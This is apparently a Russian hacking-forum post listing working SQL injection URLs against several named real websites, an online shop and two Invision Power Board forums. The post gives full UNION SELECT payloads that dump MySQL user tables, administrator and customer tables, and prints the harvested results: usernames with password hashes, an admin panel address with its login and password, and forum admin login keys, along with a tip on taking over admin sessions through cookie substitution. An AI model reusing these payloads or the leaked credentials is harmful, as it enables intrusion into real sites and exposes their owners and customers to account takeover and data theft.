|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
http://www.level.ru/ - Интернет магазин "Левел"
http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(user,0x3a,password) ,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
Версия: 4.0.18
Юзер: root@localhost
Mysql users
Код:
root:27ad7c3446c9d3dd
root:7e9607db022e3f71
freenibs:565491d704013245
for_shop_2:4ccee85a3015e2d6
Dimano:320c67895c24eb79
Админы -
http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15+from+users/*
Админка (как ни странно) - http://www.level.ru/admin
Логин: user
Пасс: user
Юзеры -
http://www.level.ru/index.php?flt=7&folder=2689&fold=11776&fld=-22912)+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15+from+clients/*
http://forum.hustleclub.ru/
На форуме стоит Инвиж, в котором присутствует древняя бага -
http://forum.hustleclub.ru/index.php?act=Post&CODE=02&f=42&t=728&qpid=6666666 66)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT( id,char(58),name,char(58),member_login_key),1,1,1, 1,1,1,1,1,1%20from%20ibf_members%20where%20id=1/*
Версия: 5.0.45-log
Юзверь: u8013@10.10.223.236
IPB Admin:
Login: Ajrat
Hash: 5fd53bdc4d50e4ffbf65dfc39ff93935
Через подмену куков становимся админами
p.s. Скулю может использовать только зареганный юзверь
Аналогично -
http://www.oskexpert.ru/
http://www.oskexpert.ru/forum/index.php?&act=Post&CODE=02&f=2&t=598&qpid=6666666 66)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT( id,char(58),name,char(58),member_login_key),1,1,1, 1,1,1,1,1,1%20from%20ibf_members%20WHERE%20id=1%20/*
Версия: 4.1.21-log
Юзверь: Uwww3191S@localhost
IPB Admin:
Login: admin
Hash: ff6f02484f67bc7990c6bd2eee3f415c
|